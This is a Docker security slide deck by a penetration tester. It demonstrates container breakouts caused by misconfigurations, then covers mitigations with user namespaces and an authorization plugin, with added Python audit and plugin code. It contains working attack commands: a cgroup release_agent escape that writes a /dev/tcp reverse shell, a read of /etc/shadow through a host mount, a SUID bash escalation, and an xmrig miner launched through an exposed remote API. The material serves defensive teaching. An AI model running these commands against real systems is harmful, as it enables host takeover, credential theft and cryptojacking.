Siam Thanat Hack Company Limited (บจก.สยามถนัดแฮก)
Responsible: Mr. Peeranat Thantaletong
Version (Date): 1.0 (2020-01-25)
Confidentiality class: Public
Docker Plugin for DevSecOps
$ whoami
Mr. Peeranat Thantaletong (Por)
Penetration Tester
Siam Thanat Hack Company Limited
- Offensive Security Certified Professional (OSCP)
- CompTIA PenTest+
Agenda
- Docker in DevSecOps
- Container Breakout
- Software Vulnerabilities
- Security Misconfigurations
- Linux User Namespace
- Low-privileged Container
- Docker Authorization Plugin
DevSecOps
Image source: https://medium.com/@krissconnect/%E0%B8%A1%E0%B8%B2%E0%B8%97%E0%B8%B3-devsecops-%E0%B8%81%E0%B8%B1%E0%B8%99%E0%B9%80%E0%B8%96%E0%B8%AD%E0%B8%B0-63dfe3ed11fb
DevSecOps Tools
Docker
Image source: https://www.docker.com/blog/docker-101-introduction-docker-webinar-recap/
Container Breakout
RunC Container Escape Vulnerability (CVE-2019-5736)?
Image source: https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/
Escape Container via Security Misconfigurations
Misconfig 1: Running Container with --privileged
$ docker run --rm -it --privileged ubuntu bash
The --privileged flag: when it is used, the container gets full access to all host devices and none of the restrictions that seccomp, AppArmor, and Linux capabilities normally impose.
$ docker run -it --privileged -v /usr/bin/nc:/usr/bin/nc ubuntu bash
root@18ea7c42f8f2:/# mkdir /tmp/cgrp
root@18ea7c42f8f2:/# mount -t cgroup -o rdma cgroup /tmp/cgrp
root@18ea7c42f8f2:/# mkdir /tmp/cgrp/x
root@18ea7c42f8f2:/# echo 1 > /tmp/cgrp/x/notify_on_release
root@18ea7c42f8f2:/# host_path=`sed -n 's/.*perdir=([^,]*).*/1/p' /etc/mtab`
root@18ea7c42f8f2:/# echo "$host_path/shell.sh" > /tmp/cgrp/release_agent
root@18ea7c42f8f2:/# cat /tmp/cgrp/release_agent
/var/lib/docker/overlay2/0ddbdfdf4086bbb587e71efed95df8583f8b90aee419fdc5d346156f8d08cc6c/diff/shell.sh
root@18ea7c42f8f2:/# echo '#!/bin/sh' > /shell.sh
root@18ea7c42f8f2:/# echo '/bin/bash -c "/bin/bash -i >& /dev/tcp/172.17.0.2/9999 0>&1"' >> /shell.sh
root@18ea7c42f8f2:/# chmod a+x /shell.sh
$ cat /var/lib/docker/overlay2/0ddbdfdf4086bbb587e71efed95df8583f8b90aee419fdc5d346156f8d08cc6c/diff/shell.sh
#!/bin/sh
/bin/bash -c "/bin/bash -i >& /dev/tcp/172.17.0.2/9999 0>&1"
root@18ea7c42f8f2:/# sleep 2 && sh -c "echo $$ > /tmp/cgrp/x/cgroup.procs" &
root@18ea7c42f8f2:/# nc -lvp 9999
listening on [any] 9999 ...
172.17.0.1: inverse host lookup failed: Unknown host
connect to [172.17.0.2] from (UNKNOWN) [172.17.0.1] 33652
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
root@parrot:/#
Misconfig 2: Excessive Capabilities
$ docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash
The --cap-add=SYS_ADMIN flag allows a container to perform the mount syscall.
Use the --security-opt apparmor=unconfined flag to start a container without an AppArmor profile.
*Docker starts containers with the docker-default AppArmor policy by default, which prevents the use of the mount syscall even when the container is run with SYS_ADMIN.
Misconfig 3: Mount Sensitive Volumes #1
dev01@parrot:~$ docker run -it -v /:/mnt/host --rm alpine sh
/ # cat /mnt/host/etc/shadow
root:$6$jvHBn8UTWequ.Rn5$TxgN48QEo7FEWgSvmgrmrXeTMULpmc6EOxSvh4pliCVwg4Vmd3ODpAz.ICbSz6L3P7RK0lDUP.IVSRckRU9Ss.:18040:0:99999:7:::
daemon:*:18011:0:99999:7:::
bin:*:18011:0:99999:7:::
[...]
dev01@parrot:~$ docker run -it -v /:/mnt/host --rm alpine sh
/ # cp /mnt/host/bin/bash /mnt/host/tmp/bashsuid
/ # chmod a+sx /mnt/host/tmp/bashsuid
/ # exit
dev01@parrot:~$ /tmp/bashsuid -p
bashsuid-5.0# id
uid=1002(dev01) gid=1002(dev01) euid=0(root) egid=0(root)
groups=0(root),997(docker),1002(dev01)
Misconfig 4: Mount Sensitive Volumes #2
dev01@parrot:~$ docker run --rm -it -v /var/run/docker.sock:/var/run/docker.sock -v /usr/bin/docker:/usr/bin/docker ubuntu bash
root@18ea7c42f8f2:/# docker run -it --privileged -v /usr/bin/nc:/usr/bin/nc ubuntu bash
root@9121d1d3663f:/# mkdir /tmp/cgrp
root@9121d1d3663f:/# mount -t cgroup -o rdma cgroup /tmp/cgrp
root@9121d1d3663f:/# mkdir /tmp/cgrp/x
root@9121d1d3663f:/# echo 1 > /tmp/cgrp/x/notify_on_release
root@9121d1d3663f:/# host_path=`sed -n 's/.*perdir=([^,]*).*/1/p' /etc/mtab`
root@9121d1d3663f:/# echo "$host_path/shell.sh" > /tmp/cgrp/release_agent
root@9121d1d3663f:/# echo '#!/bin/sh' > /shell.sh
root@9121d1d3663f:/# echo '/bin/bash -c "/bin/bash -i >& /dev/tcp/172.17.0.2/9999 0>&1"' >> /shell.sh
root@9121d1d3663f:/# chmod a+x /shell.sh
root@9121d1d3663f:/# sleep 2 && sh -c "echo $$ > /tmp/cgrp/x/cgroup.procs" &
root@9121d1d3663f:/# nc -lvp 9999
listening on [any] 9999 ...
root@parrot:/#
Misconfig 5: Docker Remote API Exposure
Enable the remote API for dockerd
$ cat /lib/systemd/system/docker.service
[...]
ExecStart=/usr/bin/dockerd -H tcp://0.0.0.0:2375 -H fd:// --containerd=/run/containerd/containerd.sock
[...]
$ systemctl daemon-reload
$ service docker restart
Misconfig 5: Docker Remote API Exposure
$ docker -H 192.168.1.2:2375 run xmrig/xmrig -o xmr.crypto-pool.fr:443 -u 48edfHu7V9Z84YzzMa6fUueoELZ9ZRXq9VetWzYGzKt52XU5xvqgzYnDK9URnRoJMk1j8nLwEVsaSWJ4fhdUyZijBGUicoD -p x --donate-level=1
Image source:
https://cyware.com/news/monero-site-hack-how-hackers-distributed-cryptocurrency-stealing-malware-e3366e2b
Image source:
https://www.alibabacloud.com/blog/xulu-cryptojacking-leveraging-shodan-tor-and-malicious-docker-container_594869
Authentication with TLS Client Certificate
$ docker --tlsverify --tlscacert=ca.pem --tlscert=cert.pem --tlskey=key.pem -H=$HOST:2376 version
Image source: https://dker.ru/docs/component-projects/docker-swarm/overview-docker-swarm-with-tls/
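
A check a defender can run over the dockerd ExecStart line shown above: added example code written for this page (not from the slides or the Docker project) that extracts the -H endpoints and reports a tcp listener that is not protected by --tlsverify. The two ExecStart strings are constructed from the slides; the certificate paths in the hardened one are assumed.

```python
import shlex
from urllib.parse import urlsplit


def parse_dockerd_cmdline(execstart):
    """Split a dockerd ExecStart line into its -H/--host endpoints and its --flags.
    Accepts '-H x', '-Hx', '-H=x', '--host x' and '--host=x'."""
    argv = shlex.split(execstart)
    hosts, flags = [], set()
    i = 1                                   # argv[0] is /usr/bin/dockerd itself
    while i < len(argv):
        arg = argv[i]
        if arg in ("-H", "--host"):
            hosts.append(argv[i + 1])
            i += 2
            continue
        if arg.startswith("--host="):
            hosts.append(arg[len("--host="):])
        elif arg.startswith("-H"):
            hosts.append(arg[2:].lstrip("="))
        elif arg.startswith("--"):
            flags.add(arg.split("=", 1)[0])
        i += 1
    return hosts, flags


def audit_listeners(execstart, daemon_json=None):
    """Findings for every tcp:// listener.  daemon.json may also carry 'hosts' and
    'tlsverify' (dockerd refuses to start if the same option is set in both places)."""
    hosts, flags = parse_dockerd_cmdline(execstart)
    cfg = daemon_json or {}
    hosts = hosts + list(cfg.get("hosts", []))
    # Only --tlsverify authenticates the client; --tls alone just encrypts the channel.
    tls_verify = "--tlsverify" in flags or bool(cfg.get("tlsverify"))
    findings = []
    for h in hosts:
        url = urlsplit(h)
        if url.scheme != "tcp":
            continue                        # unix:// and fd:// stay local to the host
        if not tls_verify:
            findings.append(h + ": remote API without client authentication (any client is root on the host)")
        if url.hostname in (None, "", "0.0.0.0", "::"):
            findings.append(h + ": listening on all interfaces")
    return findings


# Constructed samples: the ExecStart from the slide, and a hardened one (cert paths assumed).
EXPOSED = ("/usr/bin/dockerd -H tcp://0.0.0.0:2375 -H fd:// "
           "--containerd=/run/containerd/containerd.sock")
HARDENED = ("/usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2376 --tlsverify "
            "--tlscacert=/etc/docker/ca.pem --tlscert=/etc/docker/server-cert.pem "
            "--tlskey=/etc/docker/server-key.pem --containerd=/run/containerd/containerd.sock")
```

Even with --tlsverify, every holder of a client certificate signed by the CA is effectively root on the host, so the listener still belongs behind a firewall or on a management interface.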
Low-Privileged Container
(host’s root !== container’s root)
Image source: https://medium.com/@tonistiigi/experimenting-with-rootless-docker-416c9ad8c0d6
Linux User Namespace
https://docs.docker.com/engine/security/userns-remap/
Enable User Namespaces
$ useradd -u 200000 temp-ns-root
$ groupmod -g 200000 temp-ns-root
$ useradd temp-ns
$ cat /etc/passwd | grep temp
temp-ns-root:x:200000:200000::/home/temp-ns-root:/bin/sh
temp-ns:x:1001:1001::/home/temp-ns:/bin/sh
$ cat /etc/subuid
temp-ns:200000:65536
$ cat /etc/subgid
temp-ns:200000:65536
$ cat /etc/docker/daemon.json
{
"userns-remap": "temp-ns:temp-ns"
}
$ systemctl daemon-reload
$ systemctl restart docker
$ docker info
[...]
Security Options:
userns
$ docker run -it -v /:/mnt/host --rm alpine sh
/ # cat /proc/self/uid_map
0 200000 65536
/ # cat /proc/self/gid_map
0 200000 65536
/ # cat /mnt/host/etc/shadow
cat: can't open '/mnt/host/etc/shadow': Permission denied
/ # touch /mnt/host/tmp/remapped
/ # exit
$ ls -la /tmp/remapped
-rw-r--r-- 1 temp-ns-root temp-ns-root 0 Jan 23 08:42 /tmp/remapped
$ docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined
-v /usr/bin/nc:/usr/bin/nc ubuntu bash
root@d34335b93113:/# mkdir /tmp/cgrp
root@d34335b93113:/# mount -t cgroup -o rdma cgroup /tmp/cgrp
mount: /tmp/cgrp: permission denied.
$ docker run -it --userns=host -v /:/mnt/host --rm alpine sh
/ # touch /mnt/host/tmp/remapped
/ # exit
$ ls -la /tmp/remapped
-rw-r--r-- 1 root root 0 Jan 23 08:53 /tmp/remapped
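
How the uid_map printed above turns into the ownership and the "Permission denied" seen on these slides: an added example (not from the slides) that translates IDs through a /proc/self/uid_map in both directions. The remapped map text is constructed from the slide output; the identity map stands for a process that is not in a user namespace at all, which is what --userns=host gives.

```python
OVERFLOW_ID = 65534   # kernel overflowuid/overflowgid: how an unmapped ID shows up ("nobody")


def parse_id_map(text):
    """Parse /proc/<pid>/uid_map or gid_map: lines of '<inside-start> <outside-start> <count>'."""
    entries = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) == 3:
            entries.append(tuple(int(f) for f in fields))
    return entries


def to_host_id(id_map, container_id):
    """Host-side ID behind an ID seen inside the container, or None if it is unmapped."""
    for inside, outside, count in id_map:
        if inside <= container_id < inside + count:
            return outside + (container_id - inside)
    return None


def to_container_id(id_map, host_id):
    """How a host-side ID appears inside the container; unmapped IDs become OVERFLOW_ID."""
    for inside, outside, count in id_map:
        if outside <= host_id < outside + count:
            return inside + (host_id - outside)
    return OVERFLOW_ID


def container_root_is_host_root(id_map):
    """True when uid 0 inside is uid 0 outside: no userns-remap, or --userns=host."""
    return to_host_id(id_map, 0) == 0


# Constructed samples: the map printed by `cat /proc/self/uid_map` on the slide above
# (remapped via temp-ns), and the identity map a process has without any remapping.
REMAPPED_UID_MAP = "         0     200000      65536\n"
INITIAL_UID_MAP = "         0          0 4294967295\n"


def explain(id_map):
    """Summarise what the map means for a bind-mounted host filesystem."""
    host_root = to_host_id(id_map, 0)
    return {
        "container_root_on_host": host_root,                    # owner of files it creates
        "host_root_files_seen_as": to_container_id(id_map, 0),  # 65534 when unmapped
        "is_host_root": host_root == 0,
    }
```

With the remapped map, container root writes /tmp/remapped as host uid 200000 (temp-ns-root) and reads /etc/shadow as that uid, which is why the read is denied; the --userns=host map collapses both back to real root.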
https://github.com/moby/moby/issues/22223
Docker Plugin - What is it?
In short, an OS process/service that extends the capabilities of Docker Engine.
1. Authorization
- Extend the API authorization mechanism
2. Network
- Extend network management - VXLAN, IPVLAN, MACVLAN, ...
3. Volume
- Extend persistent storage - Amazon EBS, ...
4. IPAM
- Extend IP address management - DNS, DHCP, ...
5. Graph
- Extend image and container filesystem storage
Docker Plugin API
A plugin registers itself by placing one of the following in a plugin directory:
1. Unix Domain Socket
- /run/docker/plugins/demo.sock
2. URL
- /etc/docker/plugins/demo.spec (a text file containing a URL such as:)
- unix:///other.sock
- tcp://localhost:8080
3. JSON Specification
- /etc/docker/plugins/demo.json
Docker Plugin - Volume plugin for Amazon EBS
https://docs.docker.com/engine/extend/EBS_volume/
Docker Authorization Model (1 - Default)
Docker Authorization Model (2 - with AuthZ Plugin)
Image source: https://docs.docker.com/engine/extend/plugins_authorization/
Example with docker-no-trivial-root Plugin
https://github.com/ad-freiburg/docker-no-trivial-root
Disabling some trivial ways of gaining root via Docker
Just A Quick Look At The Code
Docker Authorization Plugin
$ ./docker-no-trivial-root &
[1] 11552
$ ls -al /run/docker/plugins/
total 0
drwx------ 2 root root 60 Jan 24 05:13 .
drwx------ 8 root root 180 Jan 23 09:58 ..
srw-rw---- 1 root root 0 Jan 24 05:13 no-trivial-root.sock
$ cat /etc/docker/daemon.json
{
"authorization-plugins": ["no-trivial-root"]
}
$ systemctl daemon-reload
$ systemctl restart docker
$ docker info
[...]
Plugins:
Volume: local
Network: bridge host ipvlan macvlan null overlay
Authorization: no-trivial-root
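
What a plugin like docker-no-trivial-root does in outline, as an added example written for this page rather than the project's own code: a minimal AuthZ plugin that answers /Plugin.Activate and /AuthZPlugin.AuthZReq over a socket in /run/docker/plugins (the discovery mechanism from the Docker Plugin API slide) and denies the container-create requests behind Misconfig 1-4 (--privileged, SYS_ADMIN plus apparmor=unconfined, bind mounts of / or docker.sock). The plugin name deny-trivial-root, its socket path and the list of sensitive host paths are assumptions.

```python
"""Minimal Docker authorization (AuthZ) plugin in the spirit of docker-no-trivial-root:
it refuses container-create requests that hand out host root the way Misconfig 1-4 do.
Example code written for this page (not the project's code); plugin name is assumed."""
import base64
import json
import os
import re
from http.server import BaseHTTPRequestHandler
from socketserver import UnixStreamServer

# dockerd finds the plugin through this socket; daemon.json would then carry
# "authorization-plugins": ["deny-trivial-root"].  Name and path are assumptions.
SOCKET_PATH = "/run/docker/plugins/deny-trivial-root.sock"
CREATE_RE = re.compile(r"^/(v[\d.]+/)?containers/create")
# Host paths whose bind mount gives trivial root (assumed policy list).
SENSITIVE = ("/", "/etc", "/root", "/var/lib/docker", "/var/run/docker.sock", "/run/docker.sock")

def _sensitive(src):
    """True for a host path equal to, or below, an entry of SENSITIVE."""
    return src in SENSITIVE or any(src.startswith(p + "/") for p in SENSITIVE if p != "/")

def findings_for_host_config(hc):
    """Reasons a HostConfig (from POST /containers/create) is trivially host root."""
    reasons = []
    if hc.get("Privileged"):
        reasons.append("--privileged drops seccomp, AppArmor and capability limits")
    caps = {c.upper().replace("CAP_", "") for c in hc.get("CapAdd") or []}
    if caps & {"SYS_ADMIN", "ALL"}:
        reasons.append("--cap-add=SYS_ADMIN allows mount(2) inside the container")
    sec = [s.lower() for s in hc.get("SecurityOpt") or []]
    if "apparmor=unconfined" in sec or "apparmor:unconfined" in sec:
        reasons.append("AppArmor profile disabled")
    for bind in hc.get("Binds") or []:           # "-v /host:/ctr[:opts]"
        src = bind.split(":", 1)[0]              # named volumes have no leading "/"
        if src.startswith("/") and _sensitive(src):
            reasons.append("bind mount of sensitive host path " + src)
    for m in hc.get("Mounts") or []:             # "--mount type=bind,src=..."
        if m.get("Type") == "bind" and _sensitive(m.get("Source", "")):
            reasons.append("bind mount of sensitive host path " + m["Source"])
    if hc.get("UsernsMode") == "host":
        reasons.append("--userns=host opts out of userns-remap")
    return reasons

def authz_req(req):
    """Decide one AuthZPlugin.AuthZReq call; `req` is what dockerd POSTs
    (RequestMethod, RequestUri, base64-encoded RequestBody, ...)."""
    if req.get("RequestMethod") != "POST" or not CREATE_RE.match(req.get("RequestUri", "")):
        return {"Allow": True}                   # only container creation is policed here
    try:
        body = json.loads(base64.b64decode(req.get("RequestBody") or "") or b"{}")
    except ValueError:
        return {"Allow": False, "Msg": "unparseable container create body"}
    reasons = findings_for_host_config(body.get("HostConfig") or {})
    if reasons:
        return {"Allow": False, "Msg": "denied by policy: " + "; ".join(reasons)}
    return {"Allow": True}

def make_request(body, method="POST", uri="/v1.40/containers/create"):
    """Build the AuthZReq payload dockerd would send for a create `body` (for tests)."""
    raw = base64.b64encode(json.dumps(body).encode()).decode()
    return {"RequestMethod": method, "RequestUri": uri, "RequestBody": raw}

class AuthZHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        n = int(self.headers.get("Content-Length") or 0)
        payload = json.loads(self.rfile.read(n) or b"{}")
        if self.path == "/Plugin.Activate":
            reply = {"Implements": ["authz"]}
        elif self.path == "/AuthZPlugin.AuthZReq":
            reply = authz_req(payload)
        else:                                    # /AuthZPlugin.AuthZRes: let replies through
            reply = {"Allow": True}
        out = json.dumps(reply).encode()
        self.send_response(200)
        self.send_header("Content-Type", "application/vnd.docker.plugins.v1+json")
        self.send_header("Content-Length", str(len(out)))
        self.end_headers()
        self.wfile.write(out)

    def log_message(self, fmt, *args):           # a Unix socket has no client address to log
        pass

def serve(path=SOCKET_PATH):
    """Run the plugin; start it (as root) before restarting dockerd with the plugin enabled."""
    if os.path.exists(path):
        os.unlink(path)
    with UnixStreamServer(path, AuthZHandler) as srv:
        os.chmod(path, 0o660)                    # only root (dockerd) should reach the socket
        srv.serve_forever()
```

Call serve() from a root shell, then restart dockerd with "authorization-plugins": ["deny-trivial-root"]; only the container-create endpoint is policed here, every other API call passes through unchanged.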
Any Questions?
Contact us:
pentest@sth.sh
